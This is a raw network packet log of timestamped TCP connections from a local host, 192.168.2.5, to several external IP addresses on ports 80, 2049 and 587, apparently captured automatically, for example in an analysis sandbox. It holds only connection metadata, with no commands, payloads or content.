                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.375611067 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.557852983 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.562720060 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.562922001 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.563165903 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.563256979 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.568152905 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.568166971 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.399157047 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.402370930 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.408324003 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.408377886 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.421629906 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435388088 CET80597953.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435462952 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435960054 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435997963 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.440850973 CET80597953.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.440876961 CET80597953.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.618566036 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.619307041 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.624577045 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.624676943 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.947505951 CET5979680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.952456951 CET805979634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.952593088 CET5979680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.953444958 CET5979680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.953444958 CET5979680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.958409071 CET805979634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.958421946 CET805979634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.437732935 CET80597953.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.438198090 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.443466902 CET80597953.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.443566084 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.456315994 CET5979780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.461265087 CET805979718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.463088036 CET5979780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.463238955 CET5979780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.463326931 CET5979780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.468128920 CET805979718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.468147039 CET805979718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.924432039 CET805979634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.926100016 CET5979680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.931385040 CET805979634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.934544086 CET5979680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.170593977 CET597982049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.175643921 CET204959798212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.175757885 CET597982049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.176235914 CET597982049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.181312084 CET204959798212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.302226067 CET5979980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.307250977 CET805979947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.307423115 CET5979980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.307653904 CET5979980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.307653904 CET5979980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.312778950 CET805979947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.312791109 CET805979947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.667201996 CET204959798212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.669596910 CET597982049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.669835091 CET597982049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.953032970 CET204959798212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.953049898 CET805979718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.957159996 CET597982049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.957319021 CET5979780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.962796926 CET805979718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.965434074 CET5979780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.975018024 CET5980080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.980003119 CET805980034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.981461048 CET5980080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.981580019 CET5980080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.981599092 CET5980080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.986608982 CET805980034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.986656904 CET805980034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.759972095 CET805979947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.760559082 CET5979980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.766355991 CET805979947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.767235994 CET5979980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.954812050 CET805980034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.955369949 CET5980080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.961020947 CET805980034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.961663008 CET5980080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.975114107 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.980427027 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.980489016 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.980695009 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.980775118 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.985718012 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.985765934 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.995345116 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.001543045 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.001610041 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.002130985 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.002221107 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.007877111 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.009131908 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.656167030 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.657282114 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.663253069 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.664879084 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.414443016 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.417237043 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.422497034 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.426301956 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.431216955 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.436077118 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438474894 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438586950 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438606977 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.443406105 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.443464994 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.707884073 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.712747097 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.712850094 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.713051081 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.713088989 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.718105078 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.718169928 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.123630047 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.123855114 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.129142046 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.129209995 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.137866974 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143368006 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143457890 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143604994 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143634081 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.148572922 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.148617029 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545171976 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545810938 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545824051 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545918941 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546071053 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546119928 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546144009 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546437025 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546452999 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546485901 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546506882 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546538115 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546544075 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.547050953 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.562927961 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.563486099 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.568202972 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.568325996 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.598711967 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.603648901 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.603749037 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609092951 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609321117 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.613969088 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.614196062 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.687047005 CET598072049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.692054987 CET204959807212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.693885088 CET598072049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.694123983 CET598072049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.698992014 CET204959807212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.993133068 CET5980880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998239040 CET805980818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998347998 CET5980880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998570919 CET5980880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998759985 CET5980880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:33.004230022 CET805980818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:33.004419088 CET805980818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:33.185785055 CET204959807212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:33.187069893 CET598072049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:33.187472105 CET598072049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.041248083 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.041455984 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.046962023 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.047038078 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.121526003 CET5971980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.123651981 CET5980980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.126895905 CET8059719208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.127048969 CET5971980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.128611088 CET8059809208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.128690004 CET5980980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.133176088 CET5980980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.133244038 CET5980980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.138158083 CET8059809208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.138300896 CET8059809208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.432279110 CET805980818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.433727980 CET5980880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.440362930 CET805980818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.441081047 CET5980880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.520817041 CET59400587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.525605917 CET5875940051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.764106989 CET5875940051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.764676094 CET59400587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.775217056 CET8059809208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.830449104 CET5980980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.830892086 CET5981080192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.835659027 CET8059809208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.835711002 CET5980980192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.835783958 CET8059810208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.836690903 CET5981080192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.836910963 CET5981080192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.836940050 CET5981080192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.841939926 CET8059810208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.842523098 CET8059810208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.047936916 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.048495054 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.053855896 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.053946018 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.054140091 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.054156065 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.057012081 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.057204008 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.059705973 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.059717894 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.477526903 CET8059810208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.519967079 CET5981280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.524815083 CET805981244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.524884939 CET5981280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.525202990 CET5981280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.525202990 CET5981280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.530056000 CET805981244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.530117035 CET805981244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.684456110 CET5981080192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.695395947 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.733706951 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.733804941 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.738697052 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.738719940 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.878901005 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.947756052 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.188997030 CET805981244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.189975023 CET5981280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.195647955 CET805981244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.195796967 CET5981280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.211287975 CET5981380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.216311932 CET805981334.211.97.45192.168.2.5
